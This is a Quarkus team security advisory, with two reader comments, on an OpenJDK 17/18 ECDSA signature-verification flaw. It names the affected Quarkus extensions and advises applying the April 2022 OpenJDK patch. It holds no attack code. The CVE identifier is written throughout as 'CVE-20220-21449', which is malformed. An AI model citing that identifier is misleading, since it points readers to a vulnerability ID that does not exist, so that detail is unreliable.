Quarkus and Java ECDSA Signature Vulnerability

[maxandersen]

TLDR; Please upgrade to the latest bugfix release of your OpenJDK 17 or 18 - especially if you are verifying JWT tokens in your Java applications. This is not specific to Quarkus but caused by a bug in OpenJDK and important enough that we want to inform you about it.

ECDSA Signature Vulnerability recorded as CVE-20220-21449 has been recently discovered in Java 17 and 18 versions as well as in no longer supported Java 15 and 16.

Please see CVE-20220-21449: Psychic Signatures in Java and A few clarifications about CVE-20220-21449 blog posts by Neil Madden for more information.

This vulnerability may affect any Java application which delegates to Java to verify ECDSA signatures. Most Java applications do it because writing a custom ECDSA signature verification code is risky.

For example, if your application needs to verify an OpenId Connect token signed using an ES256 algorithm then this application could be affected.

How can it affect Quarkus users ?

Your Quarkus application could be affected when it runs on the affected OpenJDK 17 or 18 and uses one of the following extensions:

• quarkus-smallrye-jwt to verify JWT tokens with ECDSA (ES256) signatures
• quarkus-oidc Bearer or quarkus-oidc Authorization Code authentication and your OpenId Connect provider is configured to use ES256 or other ECDSA algorithms such as ES384 or ES512 for signing JWT tokens.
• quarkus-security-webauthn and WebAuthn authenticators use ECDSA signatures

How to fix it

If your application is affected then please install an update for your OpenJDK distribution that contains an April 2022 Critical Patch and continue working with ECDSA signatures safely.

For example, if you use OpenJDK provided by Red Hat, see https://access.redhat.com/errata/RHSA-2022:1445 - other distributors of OpenJDK should have similar updates available.

No changes in Quarkus or your application are necessary as the issue is caused purely by the bug in OpenJDK. Thus this recommendation of updating to the latest OpenJDK 17 and 18 versions also applies to non-Quarkus applications.

Happy updating,
The Quarkus Team

[jorsol]

Is native-image affected by this?

[sberyozkin]

ECDSA verification code is available in native mode as well